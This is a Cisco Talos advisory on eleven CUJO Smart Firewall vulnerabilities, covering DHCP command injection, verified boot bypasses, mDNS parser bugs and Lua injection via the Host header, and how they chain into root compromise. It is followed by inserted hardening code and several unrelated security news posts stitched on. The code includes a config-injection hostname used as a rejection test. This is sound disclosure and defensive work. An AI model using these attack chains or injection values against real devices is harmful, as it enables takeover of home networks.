CUJO AI produces the CUJO Smart Firewall, a device that provides protection to home networks against a myriad of threats such as malware, phishing websites and hacking attempts. Cisco Talos recently discovered 11 vulnerabilities in the CUJO Smart Firewall. These vulnerabilities could allow an attacker to bypass the safe browsing function and completely take control of the device, either by executing arbitrary code in the context of the root account, or by uploading and executing unsigned kernels on affected systems.

In accordance with our coordinated disclosure policy, Cisco Talos worked with CUJO AI to ensure that these issues are resolved and that a firmware update is available for affected customers. In most typical scenarios the firmware update process is handled by CUJO AI, allowing this update to be deployed to affected customers automatically. Given that these devices are typically deployed to provide protection for networked environments, it is recommended that affected users confirm their devices have been updated as soon as possible to ensure that the devices are no longer affected by these vulnerabilities.

Exploitation


In order to better convey the threat that these issues pose in real-world implementations, this section groups the vulnerabilities based on realistic attack scenarios in which the vulnerabilities would likely be exploited, and illustrates how chaining them together would raise the impact on the device.

CUJO is based on the OCTEON SDK, which results in a Linux-based operating system running a kernel with PaX patches, which is uncommon for internet-of-things (IoT) appliances. However, the majority of the vulnerabilities are not affected by this countermeasure.

Remote code execution, unauthenticated, with persistence


We identified two chains that could be used to execute code remotely without authentication.

    1. TALOS-2018-0683 describes a vulnerability in the Webroot BrightCloud SDK, a service used to retrieve websites' classification and reputation data. CUJO uses BrightCloud as part of their safe browsing protection. By exploiting this vulnerability, an unauthenticated attacker could impersonate BrightCloud's services and execute code on the device as the root user. As described in TALOS-2018-0686, the BrightCloud SDK defaults to using HTTP connections to communicate with the remote BrightCloud services, making the exploitation of TALOS-2018-0683 trivial if an attacker is able to intercept traffic between CUJO and BrightCloud.

    2. CUJO uses the Lunatik Lua engine in order to execute Lua scripts from within the kernel context. This is used to analyze the traffic of the entire network and is part of CUJO's safe browsing protection. TALOS-2018-0703 describes a script injection vulnerability that allows any unauthenticated user in the local network to execute Lua scripts in the kernel by specifying an arbitrary "Host" header in HTTP requests. Since Lunatik permits the use of the unsafe `load()` Lua function, this allows an attacker to execute arbitrary code in the kernel. Additionally, TALOS-2018-0702 describes an issue that can be used to trick CUJO into extracting and analyzing any arbitrary hostname. As shown at the end of the TALOS-2018-0703 advisory, a malicious website could chain both vulnerabilities together in order to force any client machine in CUJO's network to perform a POST request via JavaScript, triggering the Lua injection and effectively executing code in the kernel.
Note that the vulnerabilities above can also be exploited from the local network. Moreover, they can be further chained with the "verified boot bypass" described below in order to permanently compromise the device.

Local network code execution, unauthenticated

As previously stated, the two chains above can be exploited from the local network.

Additionally, we identified two code execution vulnerabilities (TALOS-2018-0653 and TALOS-2018-0672) that affect the parsing of mDNS messages. Note, however, that CUJO constrains the affected `mdnscap` process in a low-privileged chroot-ed environment. Therefore, an attacker would need to escalate their privileges in order to fully compromise the device.

Smartphone app code execution, with persistence

CUJO users can download an app on Android and iOS devices to configure their device. Since CUJO acts as a router and serves DHCP requests, it is possible to use the app to set up static DHCP entries. TALOS-2018-0627 shows how to leverage a vulnerability in the way DHCP hostnames are handled in order to execute arbitrary operating system commands as the root user.

Note that this can be further chained with the "verified boot bypass" described below in order to permanently compromise the device.

Device-local verified boot bypass (persistence methods)

CUJO uses Das U-Boot's "Verified Boot," an open-source primary boot loader that aims to protect the boot process from unauthorized modifications and, as a consequence, to prevent a persistent compromise of the device. Moreover, the first 16MB of CUJO's eMMC have been permanently write-protected, so that it is not possible, even for the manufacturer, to modify the system's bootloaders. We identified two vulnerabilities that bypass these protections.

  • We identified an issue in Das U-Boot, affecting versions 2013.07-rc1 to 2014.07-rc2 (inclusive). TALOS-2018-0633 shows that U-Boot FIT images' signatures are not enforced, since it is still possible to boot from legacy unsigned images. This behavior can be exploited by simply replacing a signed FIT image with a legacy (and thus unsigned) image. CUJO uses the OCTEON SDK, which in turn uses U-Boot version 2013.07, so they are both vulnerable to this issue. Because of this, and since no product can use the impacted U-Boot versions without being exposed to the issue, this CVE has been assigned to U-Boot.

As previously stated, since the U-Boot bootloader is unmodifiable, TALOS-2018-0633 cannot be fixed in CUJO. Note, however, that in isolation this is a less severe issue. See our discussion below for more details.

  • TALOS-2018-0634 describes an additional way to bypass the secure boot process. By modifying the `dhcpd.conf` file, it is possible to make the DHCP server execute shell commands. Since this file persists across reboots, it is possible to execute arbitrary commands as root at each boot, effectively compromising the system's integrity.

Safe browsing bypass

Finally, TALOS-2018-0702 shows how to bypass CUJO's safe browsing, potentially allowing malicious websites to serve malware even in the presence of CUJO's filtering.

Vulnerability details

CUJO Smart Firewall static DHCP hostname command injection vulnerability (TALOS-2018-0627/CVE-2018-3963)

The CUJO Smart Firewall is vulnerable to command injection within the DHCP daemon configuration present on affected devices. This vulnerability exists due to a lack of proper input sanitization during the DHCP configuration process. This vulnerability can be triggered when configuring a new static DHCP address on affected devices. An attacker could send a DHCP request message and set up a corresponding static DHCP entry to trigger this vulnerability. It should be noted that in order to modify the DHCP configuration on devices, an attacker would first need to authenticate to the system using valid user credentials. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands within the context of the root account on the system. For additional information, please see the advisory here.

Das U-Boot verified boot bypass (TALOS-2018-0633/CVE-2018-3968)

Das U-Boot allows an attacker to execute an unsigned kernel embedded in a legacy image format if they are able to supply a boot image to the device. This vulnerability exists because the version of Das U-Boot used by the devices lacks proper FIT signature enforcement during the boot process. While Das U-Boot has silently fixed this issue, the version used by the CUJO Smart Firewall was not updated to the new version and is thus vulnerable. However, we believe it is only a medium-severity issue in CUJO specifically, since exploitation requires either physical or local access to the device (e.g., via an additional root exploit). For additional information, please see the advisory here.

CUJO Smart Firewall dhcpd.conf verified boot bypass (TALOS-2018-0634/CVE-2018-3969)

The CUJO Smart Firewall is vulnerable to a bypass of the verified boot process. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary system commands during the system boot process. By embedding system commands into the `/config/dhcpd.conf` file, an attacker can force those commands to be executed each time the system is rebooted. Also, since this information is stored in the /config partition, it is persistent across reboots. In order to successfully exploit this vulnerability, an attacker would need the ability to write to the `/config/dhcpd.conf` file on affected systems. It is important to note that this is achievable using TALOS-2018-0627, which is described above. For additional information, please see the advisory here.
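
As an added defensive example (not CUJO's or Talos's code; the function names and the sample entry are assumptions), the following renders a static DHCP `host` declaration only after the hostname and address pass strict allowlists, so that characters carrying dhcpd.conf syntax can never reach the file and the injection path described in TALOS-2018-0627/TALOS-2018-0634 is closed at the point where user input is written:

```c
/* Added example, not CUJO code. A static DHCP entry is rendered into
 * dhcpd.conf syntax only after the hostname and address pass strict
 * allowlists, so characters that carry configuration meaning (quotes,
 * braces, semicolons, newlines) can never reach the file. The function
 * names and the sample entry are assumptions; the `host` block syntax
 * is ISC dhcpd's. */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <ctype.h>

#define HOSTNAME_MAX 63              /* one DNS label, RFC 1123 */

/* Returns 1 for a valid single-label hostname: 1..63 characters, only
 * ASCII letters, digits and '-', and not starting or ending with '-'. */
int hostname_is_valid(const char *name)
{
    size_t n = strlen(name);
    if (n == 0 || n > HOSTNAME_MAX) return 0;
    if (name[0] == '-' || name[n - 1] == '-') return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '-')) return 0;   /* rejects " ; { } \n ... */
    }
    return 1;
}

/* Returns 1 for a strict dotted quad: four decimal octets in 0..255 and
 * nothing else (no trailing characters, no empty octets). */
int ipv4_is_valid(const char *s)
{
    int octets = 0;
    while (*s) {
        if (!isdigit((unsigned char)*s)) return 0;
        int v = 0, digits = 0;
        while (isdigit((unsigned char)*s)) {
            v = v * 10 + (*s - '0');
            if (++digits > 3 || v > 255) return 0;
            s++;
        }
        octets++;
        if (*s == '.') { s++; if (!*s) return 0; }  /* no trailing dot */
        else if (*s) return 0;                      /* any other character */
    }
    return octets == 4;
}

/* Render one `host` declaration into out. Returns the length written, or
 * -1 if either value is invalid or out is too small. Because both values
 * are validated first, the output is always exactly one host declaration:
 * no additional statements can be smuggled into the configuration. */
int render_static_host(const char *hostname, const uint8_t mac[6],
                       const char *ipv4, char *out, size_t outlen)
{
    if (!hostname_is_valid(hostname) || !ipv4_is_valid(ipv4)) return -1;
    int n = snprintf(out, outlen,
        "host %s {\n"
        "  hardware ethernet %02x:%02x:%02x:%02x:%02x:%02x;\n"
        "  fixed-address %s;\n"
        "  option host-name \"%s\";\n"
        "}\n",
        hostname, mac[0], mac[1], mac[2], mac[3], mac[4], mac[5],
        ipv4, hostname);
    if (n < 0 || (size_t)n >= outlen) return -1;
    return n;
}

static const uint8_t kMac[6] = { 0x00, 0x11, 0x22, 0x33, 0x44, 0x55 }; /* constructed */
char g_buf[512];                                    /* scratch used by main() */

int main(void)
{
    /* a normal entry, then one whose hostname carries config syntax */
    const char *names[] = { "printer-01", "lab;pc" };
    for (int i = 0; i < 2; i++) {
        if (render_static_host(names[i], kMac, "192.168.1.20", g_buf, sizeof g_buf) < 0)
            printf("rejected hostname %s\n", names[i]);
        else
            fputs(g_buf, stdout);
    }
    return 0;
}
```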

      CUJO Smart Firewall mdnscap mDNS record parsing code execution vulnerability (TALOS-2018-0653/CVE-2018-3985)


      The CUJO Smart Firewall is vulnerable to an exploitable double free vulnerability present in the `mdnscap` binary on affected systems. This vulnerability exists due to the system freeing a memory space twice when an invalid query name is encountered while the device is parsing mDNS packets. This vulnerability could be leveraged by an unauthenticated attacker to obtain the ability to execute arbitrary code in the context of the mdnscap process. In order to fully compromise the system, an attacker would still need to escape the `chroot` environment and further escalate privileges. For additional information, please see the advisory here.


      CUJO Smart Firewall mdnscap mDNS label compression denial-of-service vulnerability (TALOS-2018-0671/CVE-2018-4002)


      The CUJO Smart Firewall is vulnerable to an exploitable denial-of-service vulnerability in the `mdnscap` binary present on affected systems. This vulnerability exists due to the system incorrectly processing label compression pointers while parsing mDNS packets. In certain conditions, the improper handling of compression pointers in mDNS packets can lead to uncontrolled recursion, which causes stack exhaustion and ultimately crashes the `mdnscap` process, causing a denial-of-service condition. An unauthenticated remote attacker could leverage a specially crafted mDNS packet to exploit this vulnerability and create a denial-of-service condition on affected devices. For additional information, please see the advisory here.


      CUJO Smart Firewall mdnscap mDNS character-strings code execution vulnerability (TALOS-2018-0672/CVE-2018-4003)


      The CUJO Smart Firewall is vulnerable to an exploitable code execution vulnerability in the `mdnscap` binary present on affected systems. This vulnerability exists due to the system incorrectly handling string lengths that may exist in the character strings in mDNS resource records. A specially crafted mDNS resource record could be leveraged by an unauthenticated remote attacker to create a heap-based buffer overflow condition and ultimately lead to arbitrary code execution in the context of the `mdnscap` process on affected devices. In order to fully compromise the system, an attacker would still need to escape the `chroot` environment and further escalate privileges. For additional information, please see the advisory here.


      CUJO Smart Firewall mdnscap mDNS SRV Record denial-of-service vulnerability (TALOS-2018-0681/CVE-2018-4011)


      The CUJO Smart Firewall is vulnerable to an exploitable integer underflow vulnerability in the `mdnscap` binary present on affected systems. This vulnerability exists due to the system incorrectly handling the "RDLENGTH" value when parsing SRV records in mDNS packets. An unauthenticated remote attacker could leverage a specially crafted SRV record to trigger this vulnerability and create a denial-of-service condition on affected devices. For additional information, please see the advisory here.
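      The two `mdnscap` parsing issues above (compression pointers followed without bound, and an SRV RDLENGTH trusted before it is subtracted from) both come down to missing bounds checks in the name and record parsers. The following C is an added example, not CUJO's or Talos's code: a hardened mDNS name walker that only accepts pointers landing strictly before themselves (so the walk cannot loop or recurse) and an SRV RDATA parser that validates RDLENGTH before any arithmetic. The `MAX_PTR_HOPS` cap and the sample packet bytes are assumptions constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>
#define MAX_PTR_HOPS 16   /* assumed cap on pointer hops; the backward-only rule below already prevents loops */

/* Decode a DNS/mDNS name at pkt[pos] into dotted form.  Returns 0 and sets
 * *consumed to the wire bytes the name occupies at pos (up to and including the
 * first pointer or the terminating zero); returns -1 for truncated data, a
 * reserved label type, an over-long name, or a pointer that does not land
 * strictly before itself (self/forward pointers are what make a naive
 * recursive walker exhaust its stack). */
int dns_read_name(const uint8_t *pkt, size_t len, size_t pos,
                  char *out, size_t outsz, size_t *consumed)
{
    size_t cur = pos, outlen = 0, end_of_field = 0;
    int hops = 0, jumped = 0;

    for (;;) {
        if (cur >= len) return -1;                         /* truncated */
        uint8_t l = pkt[cur];
        if ((l & 0xC0) == 0xC0) {                          /* 11xxxxxx: compression pointer */
            if (cur + 1 >= len) return -1;
            size_t target = ((size_t)(l & 0x3F) << 8) | pkt[cur + 1];
            if (!jumped) { end_of_field = cur + 2; jumped = 1; }
            if (target >= cur) return -1;                  /* must point strictly backward */
            if (++hops > MAX_PTR_HOPS) return -1;
            cur = target;
            continue;
        }
        if (l & 0xC0) return -1;                           /* 01/10 label types unsupported */
        if (l == 0) {                                      /* root label ends the name */
            if (!jumped) end_of_field = cur + 1;
            break;
        }
        if (cur + 1 + l > len) return -1;                  /* label runs past the buffer */
        if (outlen + (outlen ? 1 : 0) + l + 1 > outsz) return -1; /* room for '.', label, NUL */
        if (outlen) out[outlen++] = '.';
        memcpy(out + outlen, pkt + cur + 1, l);
        outlen += l;
        cur += 1 + l;
    }
    out[outlen] = '\0';
    *consumed = end_of_field - pos;
    return 0;
}

typedef struct { uint16_t priority, weight, port; char target[256]; } srv_record;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Parse SRV RDATA (priority, weight, port, target) at pkt[rdata_off].  RDLENGTH is
 * checked against the packet and the 6-byte fixed part before any arithmetic on it. */
int dns_parse_srv(const uint8_t *pkt, size_t len, size_t rdata_off,
                  uint16_t rdlength, srv_record *rec)
{
    size_t consumed;
    if (rdata_off > len || rdlength > len - rdata_off) return -1; /* RDATA past packet end */
    if (rdlength < 6) return -1;                                  /* too short: "rdlength - 6" would wrap */
    rec->priority = rd16(pkt + rdata_off);
    rec->weight   = rd16(pkt + rdata_off + 2);
    rec->port     = rd16(pkt + rdata_off + 4);
    /* Bound the label walk to this RDATA; pointers may still reach earlier packet bytes (RFC 6762). */
    if (dns_read_name(pkt, rdata_off + rdlength, rdata_off + 6,
                      rec->target, sizeof rec->target, &consumed) != 0) return -1;
    return consumed == (size_t)rdlength - 6 ? 0 : -1;             /* name must fill RDATA exactly */
}

/* Wrappers that report results as plain return values. */
int name_matches(const uint8_t *pkt, size_t len, size_t pos, const char *expected)
{
    char buf[256]; size_t used;
    return dns_read_name(pkt, len, pos, buf, sizeof buf, &used) == 0 && strcmp(buf, expected) == 0;
}
int srv_is(const uint8_t *pkt, size_t len, size_t rdata_off, uint16_t rdlength,
           const char *target, unsigned port)
{
    srv_record rec;
    return dns_parse_srv(pkt, len, rdata_off, rdlength, &rec) == 0
        && strcmp(rec.target, target) == 0 && rec.port == port;
}

/* Constructed test data, not captured traffic: "_http._tcp.local" at offset 0, then
 * SRV RDATA (port 8080) whose target "web.local" compresses "local" via a pointer
 * back to offset 11.  SAMPLE_LOOP is a pointer that refers to itself. */
const uint8_t SAMPLE_OK[] = {
    5,'_','h','t','t','p', 4,'_','t','c','p', 5,'l','o','c','a','l', 0,
    0x00,0x00, 0x00,0x00, 0x1F,0x90, 3,'w','e','b', 0xC0,0x0B
};
const size_t SAMPLE_OK_RDATA = 18, SAMPLE_OK_RDLEN = 12;
const uint8_t SAMPLE_LOOP[] = { 0xC0, 0x00 };

int main(void)
{
    printf("valid SRV parsed: %d\n",
           srv_is(SAMPLE_OK, sizeof SAMPLE_OK, SAMPLE_OK_RDATA, SAMPLE_OK_RDLEN, "web.local", 8080));
    printf("self-pointer rejected: %d\n", !name_matches(SAMPLE_LOOP, sizeof SAMPLE_LOOP, 0, ""));
    printf("RDLENGTH 4 rejected: %d\n",
           !srv_is(SAMPLE_OK, sizeof SAMPLE_OK, SAMPLE_OK_RDATA, 4, "web.local", 8080));
    return 0;
}
```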


      Webroot BrightCloud SDK HTTP headers-parsing code execution vulnerability (TALOS-2018-0683/CVE-2018-4012)


      The Webroot BrightCloud SDK is vulnerable to an exploitable buffer overflow in the HTTP header-parsing function. The function `bc_http_read_header` incorrectly handles overlong headers, leading to arbitrary code execution. An unauthenticated attacker could impersonate a remote BrightCloud server to trigger this vulnerability and gain arbitrary code execution on affected devices. This SDK is embedded in the CUJO Smart Firewall. For additional information, please see the advisory here.


      Webroot BrightCloud SDK HTTP connection unsafe defaults vulnerability (TALOS-2018-0686/CVE-2018-4015)


      An exploitable vulnerability exists in the HTTP client function of the Webroot BrightCloud SDK, which is used by the CUJO Smart Firewall. The configuration of the HTTP client does not enforce a secure connection by default, resulting in a failure to validate TLS certificates. An attacker could impersonate a remote BrightCloud server to exploit this vulnerability using a man-in-the-middle attack. Successful exploitation could result in exposure of sensitive credentials, the transparent alteration of BrightCloud queries, or exploitation of vulnerabilities in the underlying SDK. For additional information, please see the advisory here.

      CUJO Smart Firewall safe browsing Host header parsing firewall bypass vulnerability (TALOS-2018-0702/CVE-2018-4030)


      The CUJO Smart Firewall is vulnerable to an exploitable firewall evasion in the HTTP and HTTPS parsing used by the firewall's safe browsing function. This vulnerability exists due to the firewall improperly processing host information in HTTP and HTTPS traffic that is inspected by the devices during web reputation checking. An attacker could create specially crafted web traffic to evade this reputation checking and allow hosts to access external web servers that the firewall would not otherwise allow access to. For additional information, please see the advisory here.


      CUJO Smart Firewall threatd hostname reputation check code execution vulnerability (TALOS-2018-0703 / CVE-2018-4031)


      The CUJO Smart Firewall is vulnerable to an exploitable code execution vulnerability in the HTTP and HTTPS parsing used by the firewall's safe browsing function. This vulnerability exists due to lack of sanitization of host information present in HTTP and HTTPS traffic that is inspected by the devices during web reputation checking. This vulnerability could be leveraged by an attacker to execute arbitrary code on affected devices. An attacker could create a specially crafted network packet or leverage a malicious web server to exploit this vulnerability. For additional information, please see the advisory here.

      Versions Tested


      Talos tested and confirmed that the following CUJO Smart Firewall firmware versions are affected:

      TALOS-2018-0627 affects CUJO Smart Firewall, version 7003.

      TALOS-2018-0633 affects CUJO Smart Firewall, version 7003; OCTEON-SDK 3.1.2 to 5.1; and Das U-Boot 2013.07-rc1 to 2014.07-rc2.

      Conclusion


      As previously described, CUJO AI has provided a system update to resolve these issues. Since these devices are typically relied on to secure home network environments, they may be deployed in sensitive locations within the network. It is recommended that affected users confirm their devices have been updated as soon as possible to ensure that the devices are no longer affected by these vulnerabilities.

      Coverage


      The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

      Snort Rules: 47234, 47663, 47809, 47811, 47842, 48261, 48262

      New IoT Security Bill: Third Time’s the Charm?

      The latest bill to set security standards for connected devices sold to the US government has fewer requirements, instead leaving recommendations to the National Institute of Standards and Technology. For

      The post New IoT Security Bill: Third Time’s the Charm? appeared first on The Cyber Security Place.

      A new development shows a potential shift to using Mirai to target enterprises

      Researchers at PaloAlto Networks discovered that a new variant of the infamous Mirai botnet is targeting IoT devices belonging to businesses.

      Mirai malware first appeared in the wild in 2016 when the expert MalwareMustDie discovered it in massive attacks aimed at Internet of Things (IoT) devices.


      Since the code of the Mirai botnet was leaked online, many variants have emerged in the threat landscape. Satori, Masuta, Wicked Mirai, JenX, Omni, and the OMG botnet are just the latest variants that appeared online in 2018.

      A variant discovered last year was leveraging an open-source project to target multiple architectures, including ARM, MIPS, PowerPC, and x86.

      The new Mirai variant targets embedded devices (i.e. routers, network storage devices, NVRs, and IP cameras) and leverages various exploits to hack them.

      Experts observed attacks against WePresent WiPG-1000 Wireless Presentation systems and LG Supersign TVs, both families of devices intended for use within business environments.

      “In particular, Unit 42 found this new variant targeting WePresent WiPG-1000 Wireless Presentation systems, and in LG Supersign TVs. Both these devices are intended for use by businesses. This development indicates to us a potential shift to using Mirai to target enterprises,” Palo Alto Networks notes.

      “The previous instance where we observed the botnet targeting enterprise vulnerabilities was with the incorporation of exploits against Apache Struts and SonicWall.”

      The malicious code was hosted at a compromised website in Colombia: an “Electronic security, integration and alarm monitoring” business.

      Researchers discovered that the new Mirai variant uses a total of 27 exploits, 11 of them are new to the threat. The bot can also leverage a new set of credentials to use while carrying out brute force attacks.

      The new malware implements the same encryption scheme characteristic of Mirai; it is also able to scan for vulnerable devices and launch HTTP flood DDoS attacks.

      The samples analyzed by the experts fetched the same payload from the same IP address that had been hosting Gafgyt samples just a few days earlier, and those Gafgyt samples used the same names as the binaries fetched by the shell script.

      “IoT/Linux botnets continue to expand their attack surface, either by the incorporation of multiple exploits targeting a plethora of devices, or by adding to the list of default credentials they brute force, or both,” Palo Alto Networks concludes. “In addition, targeting enterprise vulnerabilities allows them access to links with potentially larger bandwidth than consumer device links, affording them greater firepower for DDoS attacks.”

      Further details, including IoCs, are reported in the analysis published by PaloAlto Networks.

      Pierluigi Paganini

      (SecurityAffairs – Mirai, IoT)

      The post A new development shows a potential shift to using Mirai to target enterprises appeared first on Security Affairs.


      How to Safeguard Your Family Against A Medical Data Breach

      The risk to your family’s healthcare data often begins with that piece of paper on a clipboard your physician or hospital asks you to fill out or in the online application for healthcare you completed.

      That data gets transferred into a computer where a patient Electronic Health Record (EHR) is created or added to. From there, depending on the security measures your physician, healthcare facility, or healthcare provider has put in place, your data is either safely stored or up for grabs.

      It’s a double-edged sword: We all need healthcare but to access it we have to hand over our most sensitive data armed only with the hope that the people on the other side of the glass window will do their part to protect it.

      Breaches on the Rise

      Feeling a tad vulnerable? You aren’t alone. The stats on medical breaches don’t do much to assuage consumer fears.

      A recent study in the Journal of the American Medical Association reveals that the number of annual health data breaches increased 70% over the past seven years, with 75% of the breached, lost, or stolen records compromised through a hacking or IT incident, at a cost to consumers of nearly $6 billion.

      The IoT Factor


      Not only are medical facilities vulnerable to hackers; with the growth of the Internet of Things (IoT), consumer products (which, in short, means everything is digitally connected to everything else) also provide entry points for hackers. Wireless devices at risk include insulin pumps and monitors, Fitbits, scales, thermometers, and heart and blood pressure monitors.

      To protect yourself when using these devices, experts recommend staying on top of device updates and inputting as little personal information as possible when launching and maintaining the app or device.

      The Dark Web

      The engine driving healthcare attacks of all kinds is the Dark Web, where criminals can buy, sell, and trade stolen consumer data without detection. Healthcare data is precious because it often includes a much more complete picture of a person, including social security number, credit card/banking information, birthdate, address, health care card information, and patient history.

      With this kind of data, many corrupt acts are possible including identity theft, fraudulent medical claims, tax fraud, credit card fraud, and the list goes on. Complete medical profiles garner higher prices on the Dark Web.

      Some of the most valuable data to criminals is children’s health information (stolen from pediatrician offices), since a child’s credit record is clean and therefore a more useful tool for credit card fraud.

      According to Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research, predictions for 2019 include criminals working even more diligently in the Dark Web marketplace to devise and launch more significant threats.

      “The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before,” says Samani.


      Healthcare professionals, hospitals, and health insurance companies, while they are the entry point criminals exploit and are responsible for protecting the data, aren’t the bad guys. They are being fined by the government for breaches and lack of proper security, and targeted and extorted by cyber crooks, while simultaneously focusing on patient care and outcomes. Another factor working against them is the lack of qualified cybersecurity professionals equipped to protect healthcare practices and facilities.

      Protecting ourselves and our families in the face of this kind of threat can feel overwhelming and even futile. It’s not. Every layer of protection you build between you and a hacker matters. There are some things you can do to strengthen your family’s healthcare data practices.

      Ways to Safeguard Medical Data

      Don’t be quick to share your SSN. Your family’s patient information needs to be treated like financial data because it has that same power. For that reason, don’t give away your Social Security Number — even if a medical provider asks for it. The American Medical Association (AMA) discourages medical professionals from collecting patient SSNs nowadays in light of all the security breaches.

      Keep your healthcare card close. Treat your healthcare card like a banking card. Know where it is, only offer it to physicians when checking in for an appointment, and report it immediately if it’s missing.

      Monitor statements. The Federal Trade Commission recommends consumers keep a close eye on medical bills. If someone has compromised your data, you will notice bogus charges right away. Pay close attention to your “explanation of benefits,” and immediately contact your healthcare provider if anything appears suspicious.

      Ask about security. While it’s not likely you can change your healthcare provider’s security practices on the spot, the more consumers inquire about security standards, the more accountable healthcare providers are to following strong data protection practices.

      Pay attention to apps, wearables. Understand how app owners are using your data. Where is the data stored? Who is it shared with? If the app seems sketchy on privacy, find a better one.

      How to Protect IoT Devices


      According to the Federal Bureau of Investigation (FBI), IoT devices, while improving medical care and outcomes, have their own set of safety precautions consumers need to follow.

      • Change default usernames and passwords
      • Isolate IoT devices on their own protected networks
      • Configure network firewalls to inhibit traffic from unauthorized IP addresses
      • Implement security recommendations from the device manufacturer and, if appropriate, turn off devices when not in use
      • Visit reputable websites that specialize in cybersecurity analysis when purchasing an IoT device
      • Ensure devices and their associated security patches are up-to-date
      • Apply cybersecurity best practices when connecting devices to a wireless network
      • Invest in a secure router with appropriate security and authentication practices

      The post How to Safeguard Your Family Against A Medical Data Breach appeared first on McAfee Blogs.


      The sights and sounds of Cisco Talos at RSA 2019


      An estimated 45,000 people attended this year’s RSA Conference in San Francisco to hear talks from some of the greatest minds in security.

      As always, Cisco and Talos had a massive presence at the conference, topping off the week with a keynote address featuring Matt Watchinski, the vice president of Cisco Talos, and Liz Centoni, a senior vice president and general manager of Cisco’s Internet-of-things business group.

      Blue and orange Snorts could be seen all over the conference floor, and our researchers spent the past few days speaking at the Cisco Security booth, discussing some of the latest and most pressing threats.


      After their keynote on how to protect IoT devices, Matt and Liz continued the rounds throughout the week, including sitting down for an interview with Shira Rubinoff, a cybersecurity social media influencer and author, to talk about the dangers the recent influx of IoT devices represents.



      You can also watch a recording of their keynote below and read our recap here.



      Cisco Talos would like to thank anyone who stopped by the booth, viewed our threat map or interacted with any of our threat researchers this week. For a look at what we were up to this week, click through the slideshow at the top of the post.

      This Week in Security News: IoT Threats and Risks

      Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the threats and risks to complex IoT environments. Also, learn about new security challenges and risks the food production industry faces.

      Read on:

      Securing Smart Homes and Buildings: Threats and Risks to Complex IoT Environments

      The evolution of smart homes and smart buildings into complex IoT environments reflects the continuing developments in home and industrial automation and means new threats and risks. 

      Cultivating Security in the Food Production Industry: Nipping IoT Risks and Threats in the Bud

      In the food production industry, high-tech tools and systems are being used to optimize production conditions. But new technology brings new challenges and risks. 

      Shifting Strategies: Using Social Media, SEO in Tech Support Scams

      Trend Micro observed several tech support scams being promoted in different social media platforms. These scams attempt to obtain personally identifiable information or charge victims for their “services.” 

      RSA Conference 2019: The Sky’s the Limit For Satellite Hacks

      As more satellites go up, antenna equipment becomes cheaper, and engineers don’t uphold information security principles, satellites are becoming a lucrative target for threat actors. 

      UPnP-enabled Connected Devices in the Home and Unpatched Known Vulnerabilities

      The hackers behind the cyber-attack of YouTuber PewDiePie’s channel reportedly took advantage of poorly configured routers that had the Universal Plug and Play (UPnP) service enabled. 

      Enterprises Faced Over 8 Million High-Risk Email Threats in 2018 Alone

      Trend Micro released its 2018 Cloud App Security Report and discovered that enterprises faced over 8 million high-risk email threats in 2018 alone—a significant increase over 2017.

      Exposed IoT Automation Servers and Cybercrime

      Trend Micro tested possible threat scenarios against complex IoT environments such as in smart homes and smart buildings and also looked into exposed automation platforms or servers.

      NSA Puts ‘Ghidra,’ Its Reverse-Engineering Tool for Malware, in the Hands of the Public

      After years lurking in the shadows, the National Security Agency has open-sourced their software for reverse-engineering malware to anyone with an internet connection in hopes of leading to collaborative improvements to the tool.

      Trend Micro Cloud App Security Report 2018: Advanced Defenses for Advanced Email Threats

      To provide organizations a comprehensive view of the email threat landscape, Trend Micro looked at notable occurrences of advanced email threats as well as advanced security techniques.

      Huawei Opens a Cybersecurity Transparency Center in the Heart of Europe

      5G kit maker Huawei opened a Cyber Security Transparency center in Brussels as the Chinese tech giant continues to try to neutralize suspicion in Western markets that its networking gear could be used for espionage by the Chinese state.

      2018 Mobile Threat Landscape

      Trend Micro looked back at 2018’s mobile threat landscape to see the possible threats that lie ahead and help users and organizations proactively defend against them.

      Did any of the threats and risks of complex IoT environments or the food industry surprise you? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.


      Cyber Security Week in Review (March 8)



      Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

      Top headlines this week

      • Chinese tech company Huawei is suing the U.S. government. The company alleges that the federal government violated the Constitution when it banned government agencies from buying Huawei software. The two sides have been locked in a war of words over the past year as U.S. officials raise allegations of spying and security concerns against Huawei.
      • Cisco disclosed 23 vulnerabilities affecting the NX-OS software that could put some switches at risk. The most critical vulnerability, which received a CVSS score of 8.6, lies in the Lightweight Directory Access Protocol (LDAP) in Cisco FXOS and NX-OS. An attacker could exploit this bug to gain the ability to restart the device, resulting in a denial of service. Snort rules 49334 - 49336 and 49350 can protect you from these vulnerabilities.
      • The National Security Agency released its reverse-engineering tool, Ghidra, to the public. At the RSA security conference, the agency made the software open source. While there are many reverse-engineering tools on the market, the NSA has spent years refining Ghidra and it’s largely believed to be one of the most sophisticated decompilers available. 

      From Talos

      • Information security and operational security teams need to work together to protect IoT. That was the main takeaway from Cisco’s keynote at the RSA conference earlier this week. Matt Watchinski, the vice president of Cisco Talos, and Liz Centoni, the head of Cisco’s internet-of-things business group, said that IoT devices have become so entrenched in our society that it is more important now than ever to secure them. You can watch a replay of the address here.
      • There are three vulnerabilities in Pixar RenderMan that could allow an attacker to elevate their privileges to root. RenderMan is a rendering application from Pixar, the well-known animation studio, used in animation and film production. When the application is installed, a helper tool is installed and launched as root, and this service keeps listening even after installation is complete. The vulnerabilities lie in the `Dispatch` function of that helper tool.

      Malware roundup

      • A new, layered malware has popped up on the popular Pirate Bay torrenting website. Known as PirateMatryoshka, the trojan disguises itself as a legitimate torrent. Once downloaded, it unpacks in several nested layers and acts as a downloader for several other malicious programs.
